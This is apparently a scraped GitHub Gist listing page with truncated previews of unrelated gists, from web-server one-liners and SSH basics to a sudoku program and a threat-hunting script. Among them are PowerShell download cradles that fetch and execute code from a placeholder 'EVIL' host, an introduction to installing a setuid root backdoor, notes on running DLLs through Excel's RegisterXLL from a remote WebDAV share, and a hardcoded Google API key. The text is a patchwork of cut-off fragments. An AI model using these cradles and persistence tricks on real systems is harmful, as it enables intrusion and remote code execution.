Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
willurd
/ web-servers.md
Last active
November 30, 2025 18:21
Big list of http static server one-liners
dergachev
/ setuid-root-backdoor.md
Last active
September 2, 2024 12:08
How to use setuid to install a root backdoor.
Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.
While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account from the system (including www-data, which you might not even know if compromised).
If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur
learncodeacademy
/ gist:5850f394342a5bfdbfa4
Last active
October 1, 2025 03:05
SSH Basics - Getting started with Linux Server Administration
###SSH into a remote machine###
ssh [email protected]
#or by ip address
ssh [email protected]
exit: exit
###Install Something###
#If it's a new server, update apt-get first thing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
AaronRM
/ facebook-mass-delete-group-members.js
Last active
March 23, 2018 14:51
— forked from michaelv/facebook-mass-delete-group-members.js
This javascript removes all users from a facebook group. It works with the new facebook layout. Paste this in the javascript console. Script tested in Firefox. Known issues: 1. when facebook responds slowly, the script might experience hickups.. 2. occasionially, the error 'this user is not a member of the group' pops up.. IMPORTANT: add your ow…
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var deleteAllGroupMembers = (function () { | |
| var deleteAllGroupMembers = {}; | |
| // the facebook ids of the users that will not be removed. | |
| // IMPORTANT: add your own facebook id here so that the script will not remove yourself! | |
| var excludedFbIds = ['1234','11223344']; // make sure each id is a string! | |
| var usersToDeleteQueue = []; | |
| var scriptEnabled = false; | |
| var processing = false; | |
| deleteAllGroupMembers.start = function() { |
mpj
/ monad-stream-example.js
Last active
September 14, 2022 06:42
This is the code from Monads - episode #21 of FunFunFunction (https://www.youtube.com/playlist?list=PL0zVEGEvSaeFSwPn06GKArptSxiP1Gff8)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const fetch = require('node-fetch') | |
| const Bacon = require('baconjs') | |
| function getInPortuguese(word) { | |
| // Google Translate API is a paid (but dirt cheap) service. This is my key | |
| // and will be disabled by the time the video is out. To generate your own, | |
| // go here: https://cloud.google.com/translate/v2/getting_started | |
| const apiKey = | |
| 'AIzaSyB4DyRHIsNhogQXmH16YKbZfR-lTXrQpq0' | |
| const url = |
- How to Build a Successful Information Security Career (Daniel Miessler)
- The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
- Hiring your first Security Professional (Peerlyst - Dawid Balut)
- How to Start a Career in Cyber security
- How to Get Into Information Security (ISC^2)
- https://www.isc2.org/how-to-get-into-information-security.aspx
secretGeek
/ sudoku (linqpad)
Last active
June 30, 2017 19:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void Main() | |
| { | |
| //testGenerating(); | |
| var grid = goodGrid(); | |
| //grid.Write().Dump(); | |
| grid.MakeGame(); | |
| //grid.Write().Dump(); | |
| var foundOne = false; | |
| var game = grid.Write(); | |
| while(!foundOne) |
ryhanson
/ ExcelXLL.md
Last active
November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
jaredcatkinson
/ Get-InjectedThread.ps1
Last active
October 14, 2025 02:45
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
OlderNewer